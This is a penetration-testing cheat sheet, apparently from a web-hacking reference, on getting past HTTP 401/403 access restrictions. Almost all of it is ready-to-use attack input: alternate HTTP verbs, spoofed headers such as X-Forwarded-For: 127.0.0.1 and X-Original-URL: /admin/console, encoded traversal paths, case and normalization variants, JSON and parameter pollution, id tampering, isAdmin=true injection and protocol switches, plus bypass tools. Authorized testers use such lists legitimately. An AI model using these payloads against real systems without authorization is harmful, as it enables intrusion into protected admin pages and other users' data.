401/403 Bypass

HTTP Verbs/Methods Fuzzing

Try using different verbs to access the file: GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE, PATCH, INVENTED, HACK

• Check the response headers. For example, a 200 response to HEAD with Content-Length: 55 means that the HEAD verb can access the info but there is no info exfiltration;

• X-HTTP-Method-Override: PUT can overwrite the verb used;

• TRACE verb to identify headers added by intermediate proxies.

HTTP Headers Fuzzing

• Host: <arbitrary_value>

• User-Agent: <FUZZ>

• X-Originating-IP: 127.0.0.1

• X-Forwarded-For: 127.0.0.1

• X-Forwarded: 127.0.0.1

• Forwarded-For: 127.0.0.1

• X-Remote-IP: 127.0.0.1

• X-Remote-Addr: 127.0.0.1

• X-ProxyUser-Ip: 127.0.0.1

• X-Original-URL: 127.0.0.1

• Client-IP: 127.0.0.1

• True-Client-IP: 127.0.0.1

• Cluster-Client-IP: 127.0.0.1

• X-ProxyUser-Ip: 127.0.0.1

• Host: localhost

If the path is protected, bypass the protection using these headers:

• X-Original-URL: /admin/console

• X-Rewrite-URL: /admin/console

Otherwise, try to remove the Host header.

Path Fuzzing

Encoding / Traversal

• /..%2f/path

• /%252e%252e/path (double URL encode)

• /%ef%bc%8fpath (Unicode slash → //path)

Case & Normalization

Request	Result
/secret	403 Forbidden
/SECRET	200 OK
/secret/	200 OK
/secret/.	200 OK
//secret//	200 OK
/./secret/..	200 OK
/;/secret	200 OK
/.;/secret	200 OK
//;//secret	200 OK
/secret.json	200 OK (common in Ruby apps)

Unicode Fuzzing

Use these patterns:

• /FUZZsecret

• /FUZZ/secret

• /secretFUZZ

API & JSON Bypasses

API Versions

• /v3/users_data/1234

• /v1/users_data/1234

JSON Structure

• { "id": 111 }

• { "id": [111] }

• { "id": { "id": 111 } }

Parameter Pollution

• JSON:

  {"user_id":"A","user_id":"B"}

• URL:

  user_id=A&user_id=B

Parameter Manipulation

• Change values (e.g. id=123 → id=124)

• Add params (e.g. id=124&isAdmin=true)

• Remove params

• Reorder params

• Special chars

• Boundary values (e.g. -1, 0, 99999999)

Protocol Bypasses

Change the protocol:

• HTTP/1.1 → HTTP/1.0

• HTTP/1.1 → HTTP/2

• HTTP ↔ HTTPS

Other Techniques

• Access via IP / CNAME

• Repeated legit requests (race / state issues)

• Check Wayback Machine

Useful Tools

• nomore403

• URL Fuzzer - 401/403 Bypass

• waybackurls